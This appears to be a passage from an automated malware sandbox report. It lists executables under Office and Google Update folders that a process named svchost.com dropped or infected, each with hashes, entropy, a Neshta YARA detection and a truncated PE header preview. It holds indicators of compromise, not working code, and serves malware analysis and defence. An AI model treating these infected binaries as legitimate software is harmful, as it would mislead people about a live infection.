                                                                                                                        SHA-256:713E2E20A467272CF5E174DFF81954001170C7F92143A5F34C2FFAE9B85BDC04
                                                                                                                        SHA-512:FAD8C0A7ED8FBCC7BC9704522B2A35C2BCEA68DE3A614009D49DE7F8C8B35F06DA12E5DA78EF8E96FF72983C33268046521C190C0BD0F8A644887A65DA44B2B8
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.305732261424221
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCWdVJe84MtsqXZhbkALEwcyj3Y:sr85CKVYpqeyDY
                                                                                                                        MD5:3A6E83146F925E67FD9BD350F823858C
                                                                                                                        SHA1:030EF0512034AE6FFA06C7B42041252A56613799
                                                                                                                        SHA-256:494DC48B1892964FB6D5CBB19DACBE990434EED9DEE1BD64D9E74D14681717F3
                                                                                                                        SHA-512:F06ABB303461C6F016470C343DBDACB154C2575095B67B0A2620DBF6E7F799BEC18A6F5E3C678DB107F98764701DE33C75C1E6FC08ADD22FF6D486164DC17336
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.375840229458048
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCUK78LyRHC/T5ICzzKgHiTs33fSQ19uk:sr85CUdGS2gHN3aQ1p
                                                                                                                        MD5:8D7C662937FFE3C3AA129DD3BA7B887F
                                                                                                                        SHA1:F67F3B5C32BF6CC3DEA744DAAB16177DD86DBFF6
                                                                                                                        SHA-256:656ED573131580248ACC968FABBA2197657EAEE8DD6D0BA533A50DD34E74B603
                                                                                                                        SHA-512:71235707D208BEA37FA95A5BD5EF10F768740621008A50B3E440C70B86039AC2428E8B7105A93921DD8DF659AD35C36BB4BFA2C922335680CC1660B48FD54B4A
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.461871956296466
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCqi4IvHjjWhQmgBhtV+mLtiqdSo:sr85CqThgpLTso
                                                                                                                        MD5:CE04DA14A0724F9E950D41F9B2CC1643
                                                                                                                        SHA1:EFF607BAD3A4CB05CC38065E45DC61555618A060
                                                                                                                        SHA-256:D90265A2653E732290DD6617ADD54CA1B2981481AE6B6C18C570D4552C84E826
                                                                                                                        SHA-512:6E548630AF301C8F472BACCB487C31E7E4092E3B25F439D585F36F0A24846C6C0F4A3AF34BE25389D9B9FDF6C1A03A9A8106F9FD777BFB4D1F824A29844E5803
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):5.119504084682648
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJxqs0y0gqotvngnYkJZZZZZZZZZZZZZz:JxqjQ+P04wsmJC2L4Y4YkvJt
                                                                                                                        MD5:EF92B40044CB210120E9889CA1DC1D5C
                                                                                                                        SHA1:EEDCB5BA7F70F04C3D25AD321C93F978E5E1C7A8
                                                                                                                        SHA-256:016D35F82750ECF792D64A6CFF5D376DB69F2BA1D30BEF80978CCBE84ACFFD0B
                                                                                                                        SHA-512:DBB2EC69392CFFA9ABC8EB0E2C979E5CD4F6A806E14D53F87E8D041E7F0D25816D13363FA66F97FB93DABA8E5CBB17D617029A87BBB31CDECE9A48745E321062
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):4.799951544005101
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJbR+QDxQPcfwBOB6ZZZZZZZZZZZZZbJO:JxqjQ+P04wsmJCC+WxQ0lEJRaCA
                                                                                                                        MD5:7078371E0D358B86D46D6CF87987C8CD
                                                                                                                        SHA1:6F58E6F33BB9242034F7C6CDCF17B637C060C8BA
                                                                                                                        SHA-256:2DE937273CBFE6AA5909EFD083FFE477DC7CF37739F12923E2B2FB1B1B6E17B1
                                                                                                                        SHA-512:13449BFDB7AABDC75EC51F1FCB5FE95761C22E3F9E4D1A1CBB5BFC0A3F8FE2AB2FDC3ACD0BAA0D5BADDF0CD0DB390788C60B9C664C3E3FDCC29537347B83E4EF
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.05148718063145
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCPkMrdYJnRQV6J4tuw62roH5lL1u:sr85C9rsRQIouwjQlL
                                                                                                                        MD5:D4B144B9963B3114F1D938F44200AE62
                                                                                                                        SHA1:F14C2F8BD9BD0CAC7A682D453C58B99858D6C0CE
                                                                                                                        SHA-256:CB49C8EA020EABA89BB5032060928901AA90BA2530CD5D5467D15AAB489747DA
                                                                                                                        SHA-512:80D70AAF806C46388447A4BF0DF9A98C7DBC211E290A60F3A30C560E09BF12BBDCDABB4DA0B945A8144CBE8D2B22CD4F0D9AFF4DBC33E8FBCB7DAA8244CEDA95
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.365915780903398
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC+rie7lHfYdCtBzNKxmtshDucWs/7VOb88sirz:sr85C+rN7btBAxm2Z/ps/rz
                                                                                                                        MD5:43B8EBCCF6312172AF0638D6EA2E9A4B
                                                                                                                        SHA1:C628EBF5D72FDA6B9BE07CB69312472906E1143B
                                                                                                                        SHA-256:B42F96D408CFDB35545C5900EC0E8AE72B85FC960DC4BDBDEFD0B6A4BF3A49C3
                                                                                                                        SHA-512:773A5C800CA9EE738A6152D0B9B6F1CFC410407F95CA84D72951C4D8BFE914659FD66892A927174278BA77B5190BF74B98B806E6A78AAAE2D70277345AEAFC4C
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.420838658743323
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCVNAa6ZUmWtWHpy7+OAqbrefMSy8A:sr85CVNB6zLy79b8A
                                                                                                                        MD5:58473BD19292BBBB9CE1C6BFAE872648
                                                                                                                        SHA1:D9B5084A65CF3C039D51AE4F1C39C7E5DD83DBCC
                                                                                                                        SHA-256:328E9B6CE1A7D1B4B8B602F1A2D61C56BF85CEC9293C55C047584937C9390C3D
                                                                                                                        SHA-512:E0A19F3C91BC3433D5AD83C78135346769889BA06EB56F92AE3137CB7769582BA5F6139524EEFFE238B67CDA3BCC8854F2E59283E60D23BD555DEB6152310872
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.364257425575085
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCRtWit2d+BkpzTscsot7h:sr85CRtWo2Q+ycsAh
                                                                                                                        MD5:9180D3CEE013A6DE40DD963A16951734
                                                                                                                        SHA1:18E74AD691F4448AA451FBE5AB7D374F24CB07B4
                                                                                                                        SHA-256:299E81E2FE407A151C56B24E904AA2B0B9C18F712A0B43E704034939AAD1B564
                                                                                                                        SHA-512:DBDE2F6EED630ADADC7F58FFA269DCFE2749F499B8C5DE0927DE47EFF55FB7B6A185B1323DA55307228D117629B79152638B129D92562ACCA208555E7105F9EF
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.435519044418047
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCxKZg7inyp+gsnV3SNjDBII0DNC:sr85Cx4g7Ky1p7
                                                                                                                        MD5:E7868326F5EF4E85A0FBAEC678D13A2C
                                                                                                                        SHA1:7E57578EA08482DA52474EEB3960CD4407225A59
                                                                                                                        SHA-256:D702CB2F33424FDBCE4EF3CB5B2C0DA789758F4EA6A4AB772591F110369F90F4
                                                                                                                        SHA-512:F56B049C81F2433875840455C18FF972C848C4AE0F04CCFD5BBE5C2222A26680AF3B86A301F9886A84C8D4EAC8861786AAEE224278E96F85B999BF4DA7E3306D
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\Source user\OSE.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.278417014765199
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJBr+YKB8MXTVul6YekIfQzbL2Vo8/nXS:JxqjQ+P04wsmJCUyYKBRXM6PaGxZCP
                                                                                                                        MD5:4C6732F9F7CF89C1BC807F26552F0592
                                                                                                                        SHA1:9790303D2B8FD2C4DEC80D34C7E7D61081DDB03B
                                                                                                                        SHA-256:16A32ABF53E0246C49D984F31FA56B612A818BFA4FFF7681196DEC4F6343F19F
                                                                                                                        SHA-512:56D5EDE482CFE2DEFEE022CEB66EF839E9B47F33D8A270E060A729D70FF03F74A8C1699492C8C2BFB88B70483153C79A5890B31FEB3C7B3BCDB0AFC9D4FE59A7
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\Source user\OSE.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.254081989191424
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCbblZ1PNq9uCUOFVSiHdq+sxneZ:sr85Cbbr1Pg9uCRFRzsxeZ
                                                                                                                        MD5:C2C98501C8C0A38CB3B3D89B1CD09C67
                                                                                                                        SHA1:8D8469485BD3995DE34512BAC18DA482A31B5DC2
                                                                                                                        SHA-256:EFB24F3670542E6B491E3B9092E31E5068EDC2068C986F4D96E9F8176F6DCF26
                                                                                                                        SHA-512:10A42C069528EE8D55BE2106F2851B9E26AFEA5311D63D1CEDE860DB6B8E0252C3875422B047A9C6D35FC3D3F8409771A682B67C85CACF0A8D8A9352491FC3E0
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.565853286242963
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJPwnvIu/+HCidGL0RYfqJfj+0xUYfQ76:JxqjQ+P04wsmJC6cQZo0xUFGh1SNcs8
                                                                                                                        MD5:2BE98153912196C9044AB31250DEAF28
                                                                                                                        SHA1:18487088B298B9E6B5E7FBDD00D5C37F2ED6AA78
                                                                                                                        SHA-256:47164473C9E34EC71472CB3516C4575D1C8A4484BE1308DD69AAD38CB84D03AD
                                                                                                                        SHA-512:20DB7DFC73249CE140DC3764D8A304A0CE080E9421751CA394829D0A57962D19A86C2A799CD0650DE14CD0CCF56BE887B63E696A9FB0F2D12994DDAB410CB662
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.517183428602308
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJPgOCegc5f3E/lwvSHazYLO0K/rdiiA9:JxqjQ+P04wsmJCznxUOoQXALA
                                                                                                                        MD5:10CA92590C0A328CD9DD6B232AC5B97C
                                                                                                                        SHA1:CA9C9D94ACA6666E7655B9A7E3E11EAA23D84119
                                                                                                                        SHA-256:D6E3584260FE9CC093D4E7A33A66C201059296D5BBE30DFDFDD3AD76584192CD
                                                                                                                        SHA-512:5D78BA107880C8D8FACF61EA5C097705E6410C8D2AF8D6D49540B19FD2DDAB9177080B6435D30B9E3448C81DA4C85943456F93A4F3F549DEFD0794AFE85CAD59
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.31341198420156
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCMw0wAh3A5sWBMcdSJ+L94ltGTxv5ou:sr85CMuAt2Sk2m5ou
                                                                                                                        MD5:C5CBA627E9C4F07BF06013E2E19A2ADF
                                                                                                                        SHA1:B8678C954DE42C8D686384179EB1835E378C19E3
                                                                                                                        SHA-256:0215077B4DAAC5B17314C2A55673E2416ADAD7CD34E8C33AE748AE22C59A2CC5
                                                                                                                        SHA-512:234455B1C396B38DF98C569584C85CE153423CAC75E9E0DBCB724D9A0795FBCBE6D116185017535CC23ABAC49DCE9C77A9D8F470BE7B899E80C7C7E5086EE76F
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.571220400525005
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC85J2AeSh8/J7YGzhc299YX:sr85CRgh2Bh1c27YX
                                                                                                                        MD5:2CE4DFB3663A6C0B5EA20EA10DECE139
                                                                                                                        SHA1:A9D39DDD39D9419D1B0A836E9110BC5E7CE071DA
                                                                                                                        SHA-256:006DC11C857D8EC872D4ECFB6CF70FB1BAB5C95AF8773BBEC11E07C2E0BEFC27
                                                                                                                        SHA-512:0F25FF89C156ED21AFB55F07BE74C8B290C9E42710A3AE3917CE2FEAEE3626FA20E26F1088CF47CC487B18C69E3A1A3B560A321F63EAAB9A3F478822B2B0F904
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.35638621946935
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJ1jaG5lO8Ao+MJo1So6lSvUpRGaCJ9K7:JxqjQ+P04wsmJCwNbRu+2Hdt5yG10x
                                                                                                                        MD5:9AC378232CF66E98AC476EE00ACD8A6B
                                                                                                                        SHA1:ADDECA30D06C773A5C6D209646EC64DC0CDF3039
                                                                                                                        SHA-256:F3C6416304690DD5950F44E4721CE140B8932BE7C130204DEE2A623998F0F716
                                                                                                                        SHA-512:F14621706EF7E9E480A13E17B3A0764B93AE06EC6507C2401FC57D29D565397969A98091E373DF06A169C3005537A8E635610F1091AED5B64B8A22D9D253B46E
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.572547877647106
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCBeljakK11t5rL6Tfr/sVKQ7t:sr85CBkjtQVrY/0
                                                                                                                        MD5:FDB7DA820D2F539A317A598BA31067C8
                                                                                                                        SHA1:C9D147B854A2BB03D782A3BA1C645C525DA0EBD8
                                                                                                                        SHA-256:2D98E44BE09EDB2627AAB1A7AC69FF72CC7C06E24CA77B9F4C14A602B5DD78BB
